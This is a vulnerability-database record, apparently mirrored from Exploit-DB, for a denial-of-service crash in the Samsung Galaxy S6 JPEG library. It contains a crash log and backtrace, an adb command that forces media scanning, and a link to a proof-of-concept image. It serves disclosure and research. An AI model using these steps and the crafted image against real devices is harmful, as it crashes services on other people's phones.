ID
VAR-E-201602-0078
EDB ID
39424
TITLE
Samsung Galaxy S6 - libQjpeg je_free Crash - Android dos Exploit
Trust: 0.6
DESCRIPTION
Samsung Galaxy S6 - libQjpeg je_free Crash.. dos exploit for Android platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | samsung | model: | galaxy s6 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
Source: https://code.google.com/p/google-security-research/issues/detail?id=617
The attached jpg causes an invalid pointer to be freed when media scanning occurs.
F/libc (11192): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xffffffffffffb0 in tid 14368 (HEAVY#7)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 11192, tid: 14368, name: HEAVY#7 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xffffffffffffb0
I/DEBUG ( 3021): x0 0000000000000002 x1 0000007f89fa9758 x2 00000000003fffff x3 0000000000000000
I/DEBUG ( 3021): x4 0000000000000000 x5 0000007f89f98000 x6 0000007f89fa9790 x7 0000000000000006
I/DEBUG ( 3021): x8 fffffffffffffffa x9 ffffffffffffffee x10 ffffffffffffff70 x11 0000007f7f000bb8
I/DEBUG ( 3021): x12 0000000000000014 x13 0000007f89f98000 x14 0000007f89fa5000 x15 0000004000000000
I/DEBUG ( 3021): x16 0000007f7eed6ba0 x17 0000007f89ef38fc x18 0000007f89fa9830 x19 0000000000000002
I/DEBUG ( 3021): x20 000000000000001f x21 0000007f89f98000 x22 00000000ffffffff x23 0000007f7f0647f8
I/DEBUG ( 3021): x24 0000007f71809b10 x25 0000000000000010 x26 0000000000000080 x27 fffffffffffffffc
I/DEBUG ( 3021): x28 0000007f7edf9dd0 x29 0000007f7edf9b50 x30 0000007f89ef3914
I/DEBUG ( 3021): sp 0000007f7edf9b50 pc 0000007f89f53b24 pstate 0000000020000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000079b24 /system/lib64/libc.so (je_free+92)
I/DEBUG ( 3021): #01 pc 0000000000019910 /system/lib64/libc.so (free+20)
I/DEBUG ( 3021): #02 pc 000000000003f8cc /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+916)
I/DEBUG ( 3021): #03 pc 0000000000043890 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2852)
I/DEBUG ( 3021): #04 pc 00000000000439b4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 3021): #05 pc 0000000000043af0 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+284)
I/DEBUG ( 3021): #06 pc 0000000000045ddc /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+440)
I/DEBUG ( 3021): #07 pc 00000000000a24c0 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 3021): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 3021): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39424.zip
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
libQjpeg je_free Crash
Trust: 1.6
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 39424 | Trust: 1.6 |
| db: | EDBNET | id: | 60342 | Trust: 0.6 |
REFERENCES
| url: | https://code.google.com/p/google-security-research/issues/detail?id=617 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/39424/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 39424 |
| db: | EDBNET | id: | 60342 |
LAST UPDATE DATE
2022-07-27T09:24:30.128000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 39424 | date: | 2016-02-08T00:00:00 |
| db: | EDBNET | id: | 60342 | date: | 2016-02-08T00:00:00 |